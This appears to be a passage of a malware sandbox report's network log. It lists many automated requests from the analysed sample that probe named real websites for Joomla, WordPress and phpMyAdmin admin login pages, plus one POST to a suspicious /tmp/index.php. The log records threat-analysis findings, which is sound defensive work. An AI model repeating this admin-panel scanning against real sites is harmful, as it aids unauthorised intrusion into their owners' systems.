                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: erikamoveis.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: elteconline.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: roland-sk.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: nakacho.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: roland-sk.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: oitacity.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: enso-center.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://enso-center.org/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: enso-center.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://enso-center.org/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: oitacity.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: emmetisportfun.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: hokal.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: hokal.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: hokal.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: brightright.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lyljjqxhhpwe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: humydrole.com
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://tsutomu.com/administrator/
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /eshop HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://tsutomu.com/administrator/
                                Source: global trafficHTTP traffic detected: GET /eshop HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: instalanova.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: brightright.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://brightright.com/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: janckulik.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: emr.com.arAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: preda.plAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: instalanova.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://instalanova.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://elossa.de/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: predan.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: janckulik.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nakacho.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: oitacity.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: oitacity.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nakacho.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: erikamoveis.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://erikamoveis.com.br/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: janckulik.skAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=hg0s2enuefjtdt9jcr0vlbien2User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://janckulik.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: rotas.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: rotas.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: reproma.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: predajpaliet.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: eurisproagro.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: s-kotobuki-s.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: escolapatelli.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: escolapatelli.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: rotas.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://rotas.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: reproma.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://reproma.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: rotas.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://rotas.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://abatek.sk/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://abatek.sk/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://abatek.sk/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: eurisproagro.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eurisproagro.sk/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://abatek.sk/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ericrothphoto.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eshopy-katalog.sk/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eshopy-katalog.sk/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: e-art-studio.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: detmar.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: detmar.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: e-bicycles.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: e-bicycles.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: nakacho.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: kingsway-hk.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: escolapatelli.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://escolapatelli.com.br/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: escolapatelli.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://escolapatelli.com.br/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://eurokamen.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: st-comet.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: enso-center.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: enso-center.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: keramat.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: enso-center.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://enso-center.org/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: enso-center.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://enso-center.org/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: st-comet.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://st-comet.com/administrator/
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: brightright.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: janckulik.skAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=bdmjpgckhs0bhq2001gh1oo7d2User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://janckulik.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nakupusa.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: brightright.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nakupusa.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
